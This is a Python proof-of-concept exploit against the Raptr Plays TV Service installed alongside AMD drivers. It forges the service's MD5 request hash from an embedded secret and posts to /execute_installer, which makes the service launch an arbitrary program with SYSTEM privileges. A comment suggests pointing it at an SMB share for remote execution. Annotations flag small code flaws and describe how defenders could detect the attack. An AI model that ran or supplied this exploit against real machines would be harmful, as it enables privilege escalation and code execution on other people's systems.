########################################################################
#http://support.amd.com/en-us/download?cmpid=CCCOffline -
#Click "Automatically Detect - Download Now"
#Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
#OR
#
#https://plays.tv/download
#
#Target OS: Windows( Any )
#Privilege: SYSTEM
#Type:Arbitrary File Execution
#
#Notes: Second minor bug allows for arbitrary file write of
#       uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import json
import hashlib
# NOTE(review): urllib.parse and urllib.error are used below but never
# imported here explicitly; they resolve only because urllib.request
# imports both itself. An explicit `import urllib.parse` / `import
# urllib.error` would make that dependency visible.


def check_svc( path, data ):
    """Probe the service at the module-level ``addr`` and report whether its
    error text matches the Raptr / Plays TV fingerprint.

    The request is a POST whose body is the literal string ``"data"``. If the
    service answers 2xx the function returns a "[-]" string; if it raises an
    HTTPError whose body equals 'Security failed - Missing hash or
    message[data]' it returns a "[+]" string; any other HTTPError falls off
    the end and yields None. Non-HTTP errors (URLError, connection refused)
    propagate to the caller.

    NOTE(review): neither ``path`` nor ``data`` is used -- the URL comes from
    the module-level ``addr`` and the posted body is the literal "data". The
    only call site (commented out near the bottom of the file) also passes
    the two arguments in reversed order.
    """
    #Setup request
    request = urllib.request.Request(addr)  # module-level addr, not `path`
    #add post data
    try:
        resp = urllib.request.urlopen(request, "data".encode("utf-8"))  # body is the literal "data", not `data`
        return "[-] Not Raptr, Plays TV service"
    except urllib.error.HTTPError as err:
        error_message = err.read().decode("utf-8")
        if error_message == 'Security failed - Missing hash or message[data]':
            return "[+] Raptr, Plays TV service"
        # Any other HTTP error message: implicit None.


def post_req( path, data ):
    """POST ``data`` (JSON-encoded) to the module-level ``addr`` together with
    the integrity hash the service expects.

    The form body has two fields: ``data`` (the JSON payload) and ``hash`` =
    MD5(path + json + secret_key). The secret is a fixed constant embedded in
    the client, so a valid hash only proves the sender knows that constant;
    it does not authenticate who is calling. From a defender's point of view
    this check therefore provides no access control on the endpoint.

    Args:
        path: URL path folded into the hash. It must agree with the path
            already baked into ``addr``; it is not used to build the URL.
        data: JSON-serialisable payload.

    Returns:
        The raw response body as bytes. HTTP errors propagate as
        urllib.error.HTTPError.
    """
    secret_key = 'a%qs0t33QgiE6ut^0I&Y'  # static client-side secret (see docstring)
    #Setup request
    request = urllib.request.Request(addr)
    json_data = json.dumps(data)
    # Integrity "hash": plain (unkeyed) MD5 over path + JSON + static secret.
    m = hashlib.md5()
    hash_data = path + json_data + secret_key
    m.update(hash_data.encode('utf8'))
    hash_str = m.hexdigest()
    #add post data
    p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
    resp = urllib.request.urlopen(request, p_data)
    return resp.read()


#Target IP address
ip = '127.0.0.1'

##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
# NOTE(review): the comment above says the port is ephemeral and recorded
# in the registry, so this constant is a snapshot from one install rather
# than a fixed property of the service.
port = 50452

##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
# Defender note: per the format above, the observable artefact of this
# request is a child process of the Plays TV service (running as SYSTEM per
# the header) whose command line carries `-appdata ... -auto_installed 1`
# with an installer path that the service did not itself download. Process
# creation logging keyed on that parent/command-line pair is the detection
# point; the mitigation is to ensure the endpoint cannot be reached by
# unprivileged callers.
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution

# Both JSON fields are substituted into the CreateProcess format string
# shown above; here the same path is used for both.
data = { "installer": cmd, "appdata": cmd }

#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path  # read by check_svc/post_req as a global

#Check if the remote service is a Raptr Plays TV svc
# NOTE(review): argument order here is (data, path) but check_svc is
# declared as (path, data); harmless only because the function ignores both.
#ret = check_svc(data, path)
#print(ret)

#Exploit service
ret = post_req(path, data)
print(ret)